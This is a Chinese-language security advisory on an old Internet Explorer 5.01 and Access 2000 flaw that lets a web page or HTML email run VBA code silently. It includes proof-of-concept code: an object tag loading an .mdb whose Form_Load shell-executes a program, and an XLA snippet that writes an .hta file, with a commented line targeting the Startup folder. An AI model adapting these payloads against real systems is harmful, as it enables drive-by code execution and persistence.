微软 ie5.01 和 access 2000 可使用户执行恶意 vba 代码 (app,缺陷)
涉及程序:
microsoft internet explorer 5.01、microsoft access 2000
描述:
微软 ie5.01 和 access 2000 可使用户执行恶意 vba 代码
详细:
受影响的系统:
microsoft access 2000
+ microsoft office 2000
– microsoft windows 98
– microsoft windows 95
– microsoft windows nt 4.0
– microsoft windows nt 2000
microsoft internet explorer 5.01
+ microsoft windows 98
+ microsoft windows 95
+ microsoft windows nt 4.0
+ microsoft windows nt 2000
如果用户使用 ie 5.01 和 access 2000,有可能被服务器远程执行 visual basic for applications (vba) 代码。通过 www 页面或使用了 iframe 的 html 格式的邮件,可以在远程浏览者的计算机上执行 vba 代码,而无需用户确认。创建包含vba代码的 *.mdb 文件,其中的 shell() 调用足以执行客户方任意已知的可执行文件。接下来,在 html 页面中通过 object tag 引用这些恶意的 *.mdb 文件,当浏览器加载这页面的时候,vba代码将被执行。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
———–access.html—————————-
<object data="db3.mdb" id="d1"></object>
———–in form1 of db3.mdb———————
private sub form_load()
on error goto err_command0_click
dim stappname as string
stappname = "c:\program files\accessories\wordpad.exe"
msgbox ("trying to start: " & stappname)
call shell(stappname, 1)
exit_command0_click:
exit sub
err_command0_click:
msgbox err.description
resume exit_command0_click
end sub
—————————————————
—————————————————
<object data="book1.xla" id="sh1" width=0 height=0>
</object>
<script>
function f()
{
fn="c:\\georgi-xla.hta";
sh1.object.saveas(fn,6);
//sh1.object.saveas("c:\\windows\\start
menu\\programs\\startup\\georgi-xla.hta",6);
alert(fn+" sucessfully written");
}
settimeout("f()",5000);
</script>
—————————————————
